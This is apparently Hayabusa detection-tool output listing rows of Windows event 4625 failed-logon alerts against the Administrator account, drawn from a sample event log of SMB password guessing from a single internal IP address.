2016-09-20 01:52:15.330 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1dUzuddZH3Stespw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LKpORcDX0ccf1xMq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: u4RbbKttCYPld8RR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.456 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: joni643cVcuBZH9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.509 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bqY6TkW782CWKtvK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: d8c1I63ULh17l0rN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.594 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cjOtMpWutC9qeSss : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gmsFnerFYwXXe4Wt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rzIZ4vC0E2CYq5mc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.775 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0uZe50jJH0aj9xZi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.835 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LZM5UuxLymuAMJcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iF1dq6UfuqpFpGkf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.938 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NQVTj9OLayvEg8dg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:15.987 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 98F9mULm7DsRUN49 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.047 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h6KjEOAdknvIMwOA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.096 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UHUu0OKm8fsHTnum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdoSyg6HkaSiJ0z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4lnVe7qNVEspxFV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Phei86bKte1UCbMi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ehA1LQ2Rs0Wts9JW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.318 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WcXtnkpww8HlSBb3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.372 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: y8U7FrQZgDvQ09Uq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.430 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UgWwCtz3Gnoq9zYd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.478 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mRNPwCogYrwSGeZf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.523 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6O9rWY8UGCbuhSwZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.552 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HuH4avUJ4AwqXTGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: japOFEaHgyT3T2fO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IXpRMMNJRgjmd4km : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gtTXA6BiiVyv42cj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wfYkwvNOfKj7rlTj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.805 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QzAZyceDjfmUOdz6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.849 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C0Qais0cF8avXJQ6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.940 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7KBM2fIEK6pEl7F2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:16.972 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N3stckaysFk58QAF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.017 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oVK4S15DDLWISQ7i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.070 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fAA1bFLD5YMohS9q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.105 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: k5V3sfIsj4kYtaGe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJw4MBG0cvIz2fMR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AXJ0UBfKCzLXJ5y0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.232 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z3A2mmYGcjHBbX3M : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.268 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oGlR6pBLnDrzMsqu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gv7nWzZ1HN9mgTya : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dnPUb3w2d7Ltif2E : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GCWXdvBeDPpeKhWJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GN3OXSzQqLDF348i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AAWiBhYPNQ0RUuOX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.662 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V5CBG3hblqr8kvWw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.706 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MDBaKpfYttm4H1gj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.743 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PNszt6piEznMlTdF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iqmBPOQIG6M1rZjX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BJs7tuZpsPMYJHOD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LUT5oe2DwS5vW84K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.928 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3OTe0uiDHhf5GzRL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:17.964 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 71TuxFRZFyZEQp1S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.008 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xRvTmizOLj3UUpD7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.044 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: LnQEZPWaN2OkpTLa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.076 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HnHR9DAtgzu561sx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.128 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DfBl3dbluZ7GiFum : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1Hlgn7gsZwRvlXAk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eyHVPtGpnmmRjJuO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.252 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0l3QC0rLt9yGaIe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.289 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XfEng3JgXLmgI8GN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.334 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ORIegzlkHy8AX6RW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AzS4xRnHKxSwz5sZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.415 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v0hA1XvRIlqwKG6g : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.464 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mKXKkvlHvjRh33Vw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JIMTGRC5IQlkrG9c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.658 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NYcLsxwbg8LkGCuQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.720 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kmttijRBtXqEbU0W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.765 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DXC3hYI1Gin59gvG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hQiozAIr9Jgklmks : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O598IvZRpbdU1liO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xlmYWrAnn3sUNSRk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.933 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0aAAkO0uOGIq8zVM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:18.968 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 26K4BIpgUbBNWbDM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
